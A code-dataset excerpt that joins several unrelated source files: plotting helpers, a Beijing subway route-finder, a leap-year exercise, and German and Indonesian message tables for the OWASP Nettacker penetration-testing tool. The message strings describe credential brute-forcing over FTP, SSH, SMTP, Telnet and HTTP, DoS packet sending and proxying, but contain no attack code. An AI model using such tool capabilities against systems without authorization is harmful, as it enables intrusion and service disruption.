"""
# get today date
date = Date()
# get today weekday
weekday = date.get_weekday()
# move date to 53 weeks before
date.weeks_before(53)
# if is not sunday, move date to sunday
if weekday != 7:
date.days_before(weekday)
return date
``` |
{
"source": "0x404/sig_proc",
"score": 2
} |
#### File: 0x404/sig_proc/waveplothelper.py
```python
from mysignalslib import Wave
from matplotlib import pyplot
from math import pi, floor, ceil
def inf_iter(obj):
while True:
for x in obj:
yield x
def set_x_ticks(plot, min_x, max_x, density=None):
# now it works only for min_x == 0
density_vals = ('very tight', 'tight', 'normal', 'loose', None)
if density not in density_vals:
raise ValueError('Possible values for density: ' + ', '.join(density_vals) + ' (auto)')
if density is None:
diff = (max_x - min_x) / pi
if diff <= 2:
density = 'very tight'
elif diff <= 5:
density = 'tight'
elif diff <= 10:
density = 'normal'
else:
density = 'loose'
x_ticks = [0]
x_labels = ['']
max_x_pis = max_x / pi
max_x_full_pis = ceil(max_x_pis)
too_much = max_x_full_pis - max_x_pis
if density == 'very tight':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/8) * pi,
(i + 1/4) * pi,
(i + 3/8) * pi,
(i + 1/2) * pi,
(i + 5/8) * pi,
(i + 3/4) * pi,
(i + 7/8) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{8}\\pi$' % (i*8 + 1),
'$\\frac{%i}{4}\\pi$' % (i*4 + 1),
'$\\frac{%i}{8}\\pi$' % (i*8 + 3),
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$\\frac{%i}{8}\\pi$' % (i*8 + 5),
'$\\frac{%i}{4}\\pi$' % (i*4 + 3),
'$\\frac{%i}{8}\\pi$' % (i*8 + 7),
'$%i\\pi$' % (i + 1)
]
for x in range(1, 9):
if too_much < x / 8:
break
x_ticks.pop()
x_labels.pop()
elif density == 'tight':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/4) * pi,
(i + 1/2) * pi,
(i + 3/4) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{4}\\pi$' % (i*4 + 1),
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$\\frac{%i}{4}\\pi$' % (i*4 + 3),
'$%i\\pi$' % (i + 1)
]
elif density == 'normal':
for i in range(max_x_full_pis):
x_ticks += [
(i + 1/2) * pi,
(i + 1) * pi]
x_labels += [
'$\\frac{%i}{2}\\pi$' % (i*2 + 1),
'$%i\\pi$' % (i + 1)
]
else:
for i in range(max_x_full_pis):
x_ticks += [
(i + 1) * pi]
x_labels += [
'$%i\\pi$' % (i + 1)
]
plot.set_xticks(x_ticks)
plot.set_xticklabels(x_labels)
def multiplot(*subplots, others=[], x_range=None):
num_rows = len(subplots) + len(others)
grid_size = (num_rows, 1)
x_range = x_range or Wave.x_range(*sum(subplots, []))
y_range = Wave.y_range(*sum(subplots, []), spacing=(1, 1))
colors = inf_iter(['turquoise', 'hotpink', 'dodgerblue', 'slateblue', 'darkorchid'])
for index, subplot in enumerate(subplots):
plot = pyplot.subplot2grid(grid_size, (index, 0))
pyplot.grid(True)
for wave in subplot:
wave.plot(next(colors))
pyplot.ylim(y_range)
pyplot.xlim(x_range)
set_x_ticks(plot, *x_range)
pyplot.locator_params(axis='y', nbins=20)
pyplot.tick_params(axis='y', labelsize=9)
pyplot.tick_params(axis='x', labelsize=13)
pyplot.legend(ncol=3, loc='upper center', bbox_to_anchor=(0.5, 1.15))
for index, other in enumerate(others):
plot = pyplot.subplot2grid(grid_size, (len(subplots) + index, 0))
pyplot.grid(True)
other.plot(next(colors))
pyplot.ylim([min(other.values), max(other.values)])
pyplot.xlim([0, len(other.values)])
pyplot.tick_params(axis='y', labelsize=9)
pyplot.tick_params(axis='x', labelsize=9)
pyplot.legend(ncol=3, loc='upper center', bbox_to_anchor=(0.5, 1.15))
pyplot.tight_layout()
pyplot.subplots_adjust(top=0.9, hspace=0.3)
``` |
{
"source": "0x404/subway",
"score": 4
} |
#### File: subway/core/model.py
```python
from core import solution
class Station:
"""
station class
"""
def __init__(self, st_name, is_trans=False):
self._name = st_name
self._trans = is_trans
@property
def name(self):
"""get station's name"""
return self._name
@property
def is_trans(self):
"""whther a station is a transfer station"""
return self._trans
def __str__(self):
if self._trans:
return "station(%s, transfer_st)" % (self._name)
return "station(%s, normal_st)" % (self._name)
class Edge:
"""
line edge
"""
def __init__(self, station_to, belong_to):
self._station_to = station_to
self._belong_to = belong_to
@property
def station_to(self):
"""which station an edge link to"""
return self._station_to
@property
def belong_to(self):
"""which line an edge belong to"""
return self._belong_to
class Line:
"""
line class, consists of stations
"""
def __init__(self, line_name, st_list, is_ring=False):
self._name = line_name
self._st_list = st_list
self._ring = is_ring
@property
def name(self):
"""a line's name"""
return self._name
@property
def is_ring(self):
"""whether the line is a ring"""
return self._ring
@property
def station_list(self):
"""get station list of a line"""
return self._st_list
@property
def start(self):
"""name of the first station"""
assert len(self._st_list) > 0
return self._st_list[0].name
@property
def end(self):
"""name of the last station"""
assert len(self._st_list) > 0
return self._st_list[-1].name
@property
def length(self):
"""length of line"""
return len(self._st_list)
def __str__(self):
return "地铁线: " + self._name
class SubwaySys:
"""
subwaySys class, consists of lines
"""
def __init__(self, line_list=None):
self.str2st = {} # station_name -> station
self.nexto = {} # station_name -> edge
self.lines = []
if line_list is not None:
for line in line_list:
self.add_line(line)
def add_line(self, line):
"""Add a line to subway system.
Args:
line: line object to be added.
"""
self.lines.append(line)
for i in range(len(line.station_list) - 1):
self._link(line.station_list[i], line.station_list[i + 1], line.name)
if line.is_ring and len(line.station_list) > 1:
self._link(line.station_list[0], line.station_list[-1], line.name)
def _link(self, st_i, st_j, edge_belong, directed=False):
"""Link station i and station j in subway system.
Args:
st_i: station object.
st_j: station object.
edge_belong: str, line name of Edge(station i, station j).
directed: bool, indicates whether it is directed.
Return:
None.
"""
if st_i.name not in self.str2st:
self.str2st[st_i.name] = Station(st_i.name, st_i.is_trans)
if st_j.name not in self.str2st:
self.str2st[st_j.name] = Station(st_j.name, st_j.is_trans)
st_i = st_i.name
st_j = st_j.name
if st_i not in self.nexto:
self.nexto[st_i] = []
if st_j not in self.nexto:
self.nexto[st_j] = []
if not solution.is_nexto(st_j, st_i, self.nexto):
self.nexto[st_i].append(Edge(st_j, edge_belong))
if not directed and not solution.is_nexto(st_i, st_j, self.nexto):
self.nexto[st_j].append(Edge(st_i, edge_belong))
def shortest_path(self, start, end):
"""Calculate shortest path form start to end.
Args:
start: str or station obejct, indicates start station
end: str or station object, indicates end station
Return:
a decorated shortest path,
e.g.[[start, msg], [station, msg1], ..., [end, msg]]
"""
if isinstance(start, str):
assert start in self.str2st, "station {} is not in subway system.".format(
start
)
else:
start = start.name
if isinstance(end, str):
assert end in self.str2st, "station {} is not in subway system.".format(end)
else:
end = end.name
ans_path = solution.shortest_path(start, end, self.nexto)
ans_path = list(map(lambda x: self.str2st[x], ans_path))
return solution.docorate_path(ans_path, self.nexto)
def travel_path_from(self, start):
"""Calculate the travel path.
Calculate the path that travels all station.
Args:
start: str or station object, indicats the start station.
Return:
A list of station name indicates the path.
"""
if isinstance(start, str):
assert start in self.str2st, "station {} is not in subway system".format(
start
)
else:
start = start.name
return solution.travel_path_from(start, self.nexto, self.lines)
def walk_side(self, path):
"""Test by test file.
Args:
path: list of strs, indicates station name.
Return:
{"stats" : ("true", "false", "error"), "miss_st" : None}.
"true": If the stations in the list do cover all stations of the whole subway
at least once, and the number of stations is correct,
the traversal order of stations is reasonable.
"false": The traversal order of stations is still reasonable,
but there are missing stations or the number of stations is wrong.
If there are missing stations, this program should output
at least one missing station name.
"error": If the traversal order of the station is unreasonable.
"""
return solution.verify_path(path, self.nexto)
```
#### File: subway/core/utils.py
```python
from core.model import Station
from core.model import Line
def load_lines(data_path):
"""Load subway lines from data file.
Args:
data_path: the path of subway data, specificaly `data/beijing-subway.txt`
Return:
list: a list of Line object, e.g. [Line1, Line2, ...]
"""
line_name = ""
station_list, lines = [], []
is_ring = False
file = open(data_path, mode="r", encoding="utf-8")
while True:
strs = file.readline()
if not strs and len(station_list) > 0:
if line_name:
lines.append(
Line(line_name=line_name, st_list=station_list, is_ring=is_ring)
)
break
strs = strs.strip("\n").strip()
strs = strs.split(" ")
if strs[0] == "L":
if len(station_list) > 0:
lines.append(
Line(line_name=line_name, st_list=station_list, is_ring=is_ring)
)
line_name = strs[1]
station_list = []
is_ring = True if strs[2] == "1" else False
else:
station_list.append(Station(strs[0], True if strs[1] == "1" else False))
file.close()
return lines
def load_station_pos(data_path):
"""Load station position.
Args:
data_path: the path of station position file.
Return:
a dict, which key is station name, and value is (x, y) position,
#NOTE: position here are the percentage relative to the upper left corner.
"""
station_pos = dict()
with open(data_path, encoding="utf-8") as file:
for _, line in enumerate(file):
line = line.strip("\n").strip()
line = split_by_space(line)
if len(line) != 3:
print(line)
station_name = line[0]
position_x = float(line[1]) / 3000
position_y = float(line[2]) / 1978
station_pos[station_name] = [position_x, position_y]
return station_pos
def load_test_file(data_path):
"""Load test file.
Args:
data_path: the path of test data
Return:
list: list of station name, e.g. ["海淀黄庄", "知春路", "知春里", ...]
"""
lines = []
with open(data_path, encoding="utf-8") as file:
for _, line in enumerate(file):
line = line.strip("\n").strip()
line = split_by_space(line)
lines += line
return lines
def split_by_space(inputs):
"""Split str by space.
Args:
inputs: str, e.g. "x y z ww e "
Return:
list of strs, e.g. ["x", "y", "z", "ww", "e"]
"""
ans = []
now_str = ""
length = len(inputs)
for index in range(length):
if inputs[index] == " ":
if len(now_str) > 0:
ans.append(now_str)
now_str = ""
else:
now_str = now_str + inputs[index]
if len(now_str) > 0:
ans.append(now_str)
return ans
```
#### File: subway/scripts/build.py
```python
import sys
# pylint: disable=too-many-branches, consider-using-enumerate
def generate_data(data_path, target_path):
"""
:param data_path: 源数据路径
:param target_path: 生成数据路径
源数据文件格式:
#路线名1 (#表示接下来为一条地铁线)
站点名1 站点名2 ... 站点名n
#$路线名2 ($表示该路线为环形)
站点名1 站点名2 ... 站点名n
...
# (文件最后一定以#结尾)
生成数据文件格式:
L 路线名1 1/0 # L 表示地铁线,1/0表示该地铁线是否为环形
站点名1 1/0 # 1/0表示该站点是否为换乘站
站点名2 1/0
...
站点名n 1/0
L 路线名2 1/0
站点名1 1/0
站点名2 1/0
...
站点名n 1/0
...
"""
ring = False
line_name = ""
data, st_list = [], []
file = open(data_path, mode="r", encoding="utf-8")
for line in file:
line = line.strip()
if len(line) == 0:
continue
line = line.split(" ")
for station in line:
if station[0] == "#":
if len(st_list) > 0:
data.append(
{"line": line_name, "ring": ring, "station_list": st_list}
)
ring = False
line_name = ""
st_list = []
station = station[1:]
if len(station) > 0 and station[0] == "$":
ring = True
station = station[1:]
line_name = station
else:
st_list.append({"station_name": station, "transfer": False})
file.close()
for i in range(len(data)):
for j in range(i + 1, len(data)):
for st_i in data[i]["station_list"]:
for st_j in data[j]["station_list"]:
if st_i["station_name"] == st_j["station_name"]:
st_i["transfer"] = st_j["transfer"] = True
file = open(target_path, mode="w", encoding="utf-8")
for line in data:
file.write("L " + line["line"] + " " + ("1" if line["ring"] else "0") + "\n")
for station in line["station_list"]:
file.write(
station["station_name"]
+ " "
+ ("1" if station["transfer"] else "0")
+ "\n"
)
file.close()
if __name__ == "__main__":
if len(sys.argv) != 3:
print("parameter error!")
print("python build.py source_path target_path")
print(
"example : python build.py data/beijing-subway-raw.txt data/beijing-subway.txt"
)
else:
generate_data(sys.argv[1], sys.argv[2])
print("finished!")
``` |
{
"source": "0x41haz/HackerRank",
"score": 4
} |
#### File: HackerRank/python3/writefunc.py
```python
def is_leap(year):
if ((year % 4)!=0) :
return False
elif ((year % 100)!=0):
return True
elif ((year %400)==0):
return True
else:
return False
year = int(input())
print(is_leap(year))
``` |
{
"source": "0x43f/OWASP-Nettacker",
"score": 2
} |
#### File: lib/language/messages_de.py
```python
def all_messages():
"""
keep all messages in de
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Nettacker Motor gestartet ...",
"options": "python nettacker.py [Optionen]",
"help_menu": "Zeige Nettacker Hilfe-Menü",
"license": "Bitte lesen Sie die Lizenz und die Vereinbarungen https://github.com/viraintel/OWASP-Nettacker",
"engine": "Motor",
"engine_input": "Motoreingangsoptionen",
"select_language": "wähle eine Sprache {0}",
"range": "scanne alle IPs im Bereich",
"subdomains": "Subdomains finden und scannen",
"thread_number_connections": "Thread-Nummern für Verbindungen zu einem Host",
"thread_number_hosts": "Thread-Nummern für Scan-Hosts",
"save_logs": "Speichern Sie alle Logs in der Datei (results.txt, results.html, results.json)",
"target": "Ziel",
"target_input": "Zieleingabeoptionen",
"target_list": "Ziel (e) Liste, getrennt mit \",\"",
"read_target": "Lese Ziel (e) aus Datei",
"scan_method_options": "Scan-Methodenoptionen",
"choose_scan_method": "Suchmethode {0} auswählen",
"exclude_scan_method": "Suchmethode auswählen, um {0} auszuschließen",
"username_list": "Benutzername (s) Liste, getrennt mit \",\"",
"username_from_file": "Lese den Benutzernamen aus der Datei",
"password_seperator": "Passwort (s) Liste, getrennt mit \",\"",
"read_passwords": "Lies das Passwort aus der Datei",
"port_seperator": "Port (s) Liste, getrennt mit \",\"",
"time_to_sleep": "Zeit zwischen jeder Anfrage zu schlafen",
"error_target": "Das Ziel (die Ziele) kann nicht angegeben werden",
"error_target_file": "Die Ziele können nicht angegeben werden, Datei kann nicht geöffnet werden: {0}",
"thread_number_warning": "Es ist besser, die Thread-Nummer niedriger als 100 zu verwenden, "
"BTW wir fahren fort ...",
"set_timeout": "Setzen Sie Timeout auf {0} Sekunden, es ist zu groß, oder? Übrigens machen wir weiter ...",
"scan_module_not_found": "Dieses Scanmodul [{0}] wurde nicht gefunden!",
"error_exclude_all": "Sie können nicht alle Scanmethoden ausschließen",
"exclude_module_error": "Das Modul {0}, das Sie zum Ausschluss ausgewählt haben, wurde nicht gefunden!",
"method_inputs": "Geben Sie Methodeneingaben ein, zum Beispiel: ftp_brute_users = test, admin & "
"ftp_brute_passwds = read_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "kann die Datei {0} nicht lesen",
"error_username": "Kann den Benutzernamen nicht angeben, Datei kann nicht geöffnet werden: {0}",
"found": "{0} gefunden! ({1}: {2})",
"error_password_file": "Kann das / die Passwort (e) nicht angeben, Datei kann nicht geöffnet werden: {0}",
"file_write_error": "Datei \"{0}\" ist nicht beschreibbar!",
"scan_method_select": "Bitte wählen Sie Ihre Scan-Methode!",
"remove_temp": "Entfernen von temporären Dateien!",
"sorting_results": "Ergebnisse sortieren!",
"done": "erledigt!",
"start_attack": "fange an, {0}, {1} von {2} anzugreifen",
"module_not_available": "Dieses Modul \"{0}\" ist nicht verfügbar",
"error_platform": "Leider konnte diese Version der Software nur unter Linux / Osx / Windows "
"ausgeführt werden.",
"python_version_error": "Ihre Python-Version wird nicht unterstützt!",
"skip_duplicate_target": "Doppeltes Ziel überspringen (einige Subdomains / Domains können dieselbe "
"IP und dieselben Bereiche haben)",
"unknown_target": "unbekannter Zieltyp [{0}]",
"checking_range": "Überprüfung des Bereichs {0} ...",
"checking": "Überprüfung von {0} ...",
"HOST": "GASTGEBER",
"USERNAME": "NUTZERNAME",
"PASSWORD": "<PASSWORD>",
"PORT": "HAFEN",
"TYPE": "ART",
"DESCRIPTION": "BESCHREIBUNG",
"verbose_level": "Ausführlicher Modus (0-5) (Standard 0)",
"software_version": "Softwareversion anzeigen",
"check_updates": "auf Update überprüfen",
"outgoing_proxy": "Proxy für ausgehende Verbindungen (Socks). Beispiel socks5: 127.0.0.1:9050, "
"Socken: //127.0.0.1: 9050 Socken5: //127.0.0.1: 9050 oder socks4: socks4: //"
"127.0.0.1: 9050, Authentifizierung: socks: // Benutzername: Passwort @ 127.0.0.1,"
" socks4: // Benutzername: [email protected], socks5: //"
" Benutzername: [email protected]",
"valid_socks_address": "Bitte geben Sie eine gültige Socken Adresse und Port ein. Beispiel socks5:"
" 127.0.0.1:9050, socks: //127.0.0.1: 9050, socks5: //127.0.0.1: 9050 oder"
" socks4: socks4: //127.0.0.1: 9050, authentication: socks: // username: "
"password @ 127.0.0.1, socks4: // Benutzername: [email protected], socks5: "
"// Benutzername: [email protected]",
"connection_retries": "Wiederholt, wenn das Verbindungstimeout abgelaufen ist (Standard 3)",
"ftp_connection_timeout": "FTP-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"login_successful": "ERFOLGREICH EINGELOGGT!",
"login_list_error": "ERFOLGREICH ERFOLGT, ERLAUBNIS FÜR LISTENBEFEHLE VERPFLICHTET!",
"ftp_connection_failed": "ftp-Verbindung zu {0}: {1} ist fehlgeschlagen und hat den gesamten Schritt "
"[Prozess {2} von {3}] übersprungen! gehe zum nächsten Schritt",
"input_target_error": "Das Eingabeziel für das Modul {0} muss DOMAIN, HTTP oder SINGLE_IPv4 lauten, "
"wobei {1} übersprungen wird.",
"user_pass_found": "Benutzer: {0} Pass: {1} Host: {2} Port: {3} gefunden!",
"file_listing_error": "(KEINE ERLAUBNIS FÜR LISTENDATEIEN)",
"trying_message": "{0} von {1} im Prozess {2} von {3} {4} versuchen: {5} ({6})",
"smtp_connection_timeout": "SMTP-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"smtp_connection_failed": "Die SMTP-Verbindung zu {0}: {1} ist fehlgeschlagen. Der gesamte Schritt "
"[Prozess {2} von {3}] wurde übersprungen! gehe zum nächsten Schritt",
"ssh_connection_timeout": "ssh-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"ssh_connection_failed": "ssh-Verbindung zu {0}: {1} ist fehlgeschlagen und hat den gesamten Schritt "
"[Prozess {2} von {3}] übersprungen! gehe zum nächsten Schritt",
"port/type": "{0} / {1}",
"port_found": "host: {0} port: {1} ({2}) gefunden!",
"target_submitted": "Ziel {0} gesendet!",
"current_version": "Sie führen die OWASP Nettacker-Version {0} {1} {2} {6} mit dem Codenamen {3} {4} {5}",
"feature_unavailable": "Diese Funktion ist noch nicht verfügbar! bitte starte \"git "
"clone https://github.com/viraintel/OWASP-Nettacker.git oder pip install -U "
"OWASP-Nettacker um die letzte Version zu erhalten.",
"available_graph": "Erstellen Sie ein Diagramm aller Aktivitäten und Informationen, Sie müssen "
"HTML-Ausgabe verwenden. verfügbare Diagramme: {0}",
"graph_output": "Um die Graphenfunktion zu verwenden, muss der Ausgabedateiname mit \".html\" oder "
"\".htm\" enden!",
"build_graph": "Baudiagramm ...",
"finish_build_graph": "Baugraph fertigstellen!",
"pentest_graphs": "Penetration Testing Graphs",
"graph_message": "Diese Grafik wurde von OWASP Nettacker erstellt. Diagramm enthält alle Modulaktivitäten,"
" Netzwerkkarte und vertrauliche Informationen. Bitte teilen Sie diese Datei nicht mit"
" anderen, wenn sie nicht zuverlässig ist.",
"nettacker_report": "OWASP Nettacker Bericht",
"nettacker_version_details": "Softwaredetails: OWASP Nettacker Version {0} [{1}] in {2}",
"no_open_ports": "Keine offenen Ports gefunden!",
"no_user_passwords": "kein Benutzer / Passwort gefunden!",
"loaded_modules": "{0} Module geladen ...",
"graph_module_404": "Dieses Grafikmodul wurde nicht gefunden: {0}",
"graph_module_unavailable": "Dieses Grafikmodul \"{0}\" ist nicht verfügbar",
"ping_before_scan": "ping vor dem Host scannen",
"skipping_target": "Das ganze Ziel {0} und die Scanmethode {1} werden ignoriert, da --ping-before-scan "
"wahr ist und nicht reagiert hat!",
"not_last_version": "Du verwendest nicht die letzte Version von OWASP Nettacker, bitte update.",
"cannot_update": "kann nicht nach Updates suchen, überprüfen Sie bitte Ihre Internetverbindung.",
"last_version": "Sie benutzen die letzte Version von OWASP Nettacker ...",
"directoy_listing": "Verzeichnisliste in {0} gefunden",
"insert_port_message": "Bitte geben Sie den Port über den Schalter -g "
"oder --methods-args anstelle der URL ein",
"http_connection_timeout": "http Verbindung {0} Zeitüberschreitung!",
"wizard_mode": "Starten Sie den Assistentenmodus",
"directory_file_404": "Kein Verzeichnis oder keine Datei für {0} in Port {1} gefunden",
"open_error": "{0} kann nicht geöffnet werden",
"dir_scan_get": "dir_scan_http_method Wert muss GET oder HEAD sein, setzen Sie den Standardwert auf GET.",
"list_methods": "listet alle Methoden args auf",
"module_args_error": "Modulargumente {0} können nicht abgerufen werden",
"trying_process": "{0} von {1} im Prozess {2} von {3} auf {4} ({5}) versuchen",
"domain_found": "Domäne gefunden: {0}",
"TIME": "ZEIT",
"CATEGORY": "KATEGORIE",
"module_pattern_404": "kann kein Modul mit {0} -Muster finden!",
"enter_default": "Bitte geben Sie {0} | ein Standard [{1}]>",
"enter_choices_default": "Bitte geben Sie {0} | ein Auswahl [{1}] | Standard [{2}]>",
"all_targets": "die Ziele",
"all_thread_numbers": "die Thread-Nummer",
"out_file": "der Ausgabedateiname",
"all_scan_methods": "die Scan-Methoden",
"all_scan_methods_exclude": "die auszuschließenden Scan-Methoden",
"all_usernames": "die Benutzernamen",
"all_passwords": "<PASSWORD>",
"timeout_seconds": "die Zeitüberschreitung Sekunden",
"all_ports": "die Portnummern",
"all_verbose_level": "die ausführliche Ebene",
"all_socks_proxy": "der Socken-Proxy",
"retries_number": "die Wiederholungsnummer",
"graph": "ein Graph",
"subdomain_found": "Subdomain gefunden: {0}",
"select_profile": "wähle Profil {0}",
"profile_404": "das Profil \"{0}\" wurde nicht gefunden!",
"waiting": "Warten auf {0}",
"vulnerable": "anfällig für {0}",
"target_vulnerable": "Ziel {0}: {1} ist anfällig für {2}!",
"no_vulnerability_found": "keine Verwundbarkeit gefunden! ({0})",
"Method": "Methode",
"API": "API",
"API_options": "API-Optionen",
"start_API": "Starten Sie den API-Dienst",
"API_host": "API-Hostadresse",
"API_port": "API-Portnummer",
"API_debug": "API-Debugmodus",
"API_access_key": "API-Zugriffsschlüssel",
"white_list_API": "erlauben Sie Whitelist-Hosts nur, sich mit der API zu verbinden",
"define_whie_list": "Definieren Sie Whitelist-Hosts, getrennt mit, (Beispiele: 127.0.0.1, "
"192.168.0.1/24, 10.0.0.1-10.0.0.255)",
"gen_API_access_log": "API-Zugriffsprotokoll generieren",
"API_access_log_file": "API-Zugriffsprotokolldateiname",
"API_port_int": "API-Port muss eine Ganzzahl sein!",
"unknown_ip_input": "unbekannter Eingangstyp, akzeptierte Typen sind SINGLE_IPv4, RANGE_IPv4, CIDR_IPv4",
"API_key": "* API-Schlüssel: {0}",
"ports_int": "Ports müssen Ganzzahlen sein! (z. B. 80 || 80,1080 || 80,1080-1300,9000,12000-15000)",
"through_API": "Durch die OWASP Nettacker API",
"API_invalid": "ungültiger API-Schlüssel",
"unauthorized_IP": "Ihre IP nicht autorisiert",
"not_found": "Nicht gefunden!",
"no_subdomain_found": "subdomain_scan: Keine Subdomain gegründet!",
"viewdns_domain_404": "viewdns_reverse_ip_lookup_scan: keine Domain gefunden!",
"browser_session_valid": "Ihre Browsersitzung ist gültig",
"browser_session_killed": "Ihre Browsersitzung wurde beendet",
"updating_database": "Aktualisierung der Datenbank ...",
"database_connect_fail": "Verbindung mit der Datenbank fehlgeschlagen!",
"inserting_report_db": "Bericht in die Datenbank einfügen",
"inserting_logs_db": "Einfügen von Protokollen in die Datenbank",
"removing_logs_db": "Entfernen alter Protokolle aus db",
"len_subdomain_found": "{0} Subdomain (s) gefunden!",
"len_domain_found": "{0} Domain (s) gefunden!",
"phpmyadmin_dir_404": "kein phpmyadmin Verzeichnis gefunden!",
"DOS_send": "Senden von DoS-Paketen an {0}",
"host_up": "{0} ist abgelaufen! Die Zeit bis zum Zurücksenden ist {1}",
"host_down": "Kann nicht {0} pingen!",
"root_required": "Dies muss als root ausgeführt werden",
"admin_scan_get": "admin_scan_http_method Wert muss GET oder HEAD sein, setzen Sie"
" den Standardwert auf GET.",
"telnet_connection_timeout": "Telnet-Verbindung zu {0}: {1} Zeitüberschreitung, Überspringen von {2}: {3}",
"telnet_connection_failed": "Die Telnet-Verbindung zu {0}: {1} ist fehlgeschlagen. Der ganze "
"Schritt [Prozess {2} von {3}] wurde übersprungen! gehe zum "
"nächsten Schritt",
"http_auth_success": "HTTP-Basisauthentifizierung erfolgreich - Host: {2}: {3}, Benutzer: {0}, "
"übergeben: {1} gefunden!",
"http_auth_failed": "HTTP-Basisauthentifizierung fehlgeschlagen an {0}: {3} mit {1}: {2}",
"http_form_auth_success": "HTTP-Authentifizierungserfolg - Host: {2}: {3}, Benutzer: "
"{0}, Pass: {1} gefunden!",
"http_form_auth_failed": "http-Formularauthentifizierung fehlgeschlagen an {0}: {3} mit {1}: {2}",
"http_ntlm_success": "http ntlm Authentifizierungserfolg - Host: {2}: {3}, Benutzer: {0},"
" Pass: {1} gefunden!",
"http_ntlm_failed": "Die http-ntlm-Authentifizierung ist mit {0}: {3} mit {1} fehlgeschlagen: {2}",
"no_response": "kann keine Antwort vom Ziel erhalten",
"category_framework": "Kategorie: {0}, Frameworks: {1} gefunden!",
"nothing_found": "Nichts gefunden auf {0} in {1}!",
"no_auth": "Keine Authentifizierung in {0} gefunden: {1}"
}
```
#### File: lib/language/messages_id.py
```python
def all_messages():
"""
keep all messages in id
Returns:
all messages in JSON
"""
return \
{
"scan_started": "Mesin Nettacker mulai ...",
"options": "python nettacker.py [opsi]",
"help_menu": "Tampilkan Menu Bantuan Nettacker",
"license": "Harap baca lisensi dan perjanjian https://github.com/viraintel/OWASP-Nettacker",
"engine": "Mesin",
"engine_input": "Opsi masukan mesin",
"select_language": "pilih bahasa {0}",
"range": "pindai semua IP dalam rentang",
"subdomains": "cari dan pindai subdomain",
"thread_number_connections": "nomor utas untuk koneksi ke host",
"thread_number_hosts": "nomor utas untuk host pemindaian",
"save_logs": "simpan semua log dalam file (results.txt, results.html, results.json)",
"target": "Target",
"target_input": "Opsi masukan target",
"target_list": "daftar target (s), terpisah dengan \",\"",
"read_target": "baca target (s) dari file",
"scan_method_options": "Pindai opsi metode",
"choose_scan_method": "pilih metode pemindaian {0}",
"exclude_scan_method": "pilih metode pemindaian untuk mengecualikan {0}",
"username_list": "daftar nama pengguna (s), terpisah dengan \",\"",
"username_from_file": "baca nama pengguna (s) dari file",
"password_seperator": "daftar kata sandi, terpisah dengan \",\"",
"read_passwords": "baca kata sandi (s) dari file",
"port_seperator": "daftar port (s), terpisah dengan \",\"",
"time_to_sleep": "waktu untuk tidur di antara setiap permintaan",
"error_target": "Tidak dapat menentukan target (s)",
"error_target_file": "Tidak dapat menentukan target (s), tidak dapat membuka file: {0}",
"thread_number_warning": "lebih baik menggunakan nomor utas lebih rendah dari 100, BTW kami terus ...",
"set_timeout": "mengatur waktu tunggu hingga {0} detik, itu terlalu besar, bukan? "
"dengan cara kita melanjutkan ...",
"scan_module_not_found": "modul pemindaian ini [{0}] tidak ditemukan!",
"error_exclude_all": "Anda tidak dapat mengecualikan semua metode pemindaian",
"exclude_module_error": "{0} modul yang Anda pilih untuk dikecualikan tidak ditemukan!",
"method_inputs": "masukkan input metode, contoh: ftp_brute_users = test, admin & "
"ftp_brute_passwds = baca_from_file: /tmp/pass.txt&ftp_brute_port=21",
"error_reading_file": "tidak bisa membaca file {0}",
"error_username": "Tidak dapat menentukan nama pengguna (s), tidak dapat membuka file: {0}",
"found": "{0} ditemukan! ({1}: {2})",
"error_password_file": "Tidak dapat menentukan kata sandi (s), tidak dapat membuka file: {0}",
"file_write_error": "file \"{0}\" tidak dapat ditulis!",
"scan_method_select": "silakan pilih metode pemindaian Anda!",
"remove_temp": "menghapus file temp!",
"sorting_results": "hasil penyortiran!",
"done": "selesai!",
"start_attack": "mulai menyerang {0}, {1} dari {2}",
"module_not_available": "modul ini \"{0}\" tidak tersedia",
"error_platform": "sayangnya versi perangkat lunak ini hanya bisa dijalankan di linux / osx / windows.",
"python_version_error": "Versi Python Anda tidak didukung!",
"skip_duplicate_target": "lewati target duplikat (beberapa subdomain / domain mungkin "
"memiliki IP dan Rentang yang sama)",
"unknown_target": "jenis target yang tidak diketahui [{0}]",
"checking_range": "memeriksa {0} rentang ...",
"checking": "memeriksa {0} ...",
"HOST": "TUAN RUMAH",
"USERNAME": "NAMA PENGGUNA",
"PASSWORD": "<PASSWORD>",
"PORT": "PELABUHAN",
"TYPE": "MENGETIK",
"DESCRIPTION": "DESKRIPSI",
"verbose_level": "tingkat modus verbose (0-5) (default 0)",
"software_version": "tampilkan versi perangkat lunak",
"check_updates": "memeriksa pembaruan",
"outgoing_proxy": "proxy koneksi keluar (kaus kaki). contoh kaus kaki5: 127.0.0.1:9050, "
"kaus kaki: //127.0.0.1: 9050 kaus kaki5: //127.0.0.1: 9050 atau kaus "
"kaki4: kaus kaki4: //127.0.0.1: 9050, autentikasi: kaus kaki: // "
"namapengguna: kata sandi @ 127.0.0.1, socks4: // username: [email protected], "
"socks5: // username: [email protected]",
"valid_socks_address": "masukkan alamat dan port kaus kaki yang valid. contoh kaus kaki5: "
"127.0.0.1:9050, kaus kaki: //127.0.0.1: 9050, kaus kaki5: //127.0.0.1:"
" 9050 atau kaus kaki4: kaus kaki4: //127.0.0.1: 9050, autentikasi: kaus"
" kaki: // namapengguna: kata sandi @ 127.0.0.1, socks4: // username: "
"[email protected], socks5: // username: [email protected]",
"connection_retries": "Retries ketika batas waktu koneksi (default 3)",
"ftp_connection_timeout": "koneksi ftp ke {0}: {1} timeout, skipping {2}: {3}",
"login_successful": "DITERUKAN SECARA SUKSES!",
"login_list_error": "DITERUKAN SECARA SUKSES, IZIN DITOLAK UNTUK DAFTAR!",
"ftp_connection_failed": "koneksi ftp ke {0}: {1} gagal, melewati seluruh langkah [proses {2} "
"{3}]! akan ke langkah berikutnya",
"input_target_error": "target input untuk {0} modul harus DOMAIN, HTTP atau SINGLE_IPv4, skipping {1}",
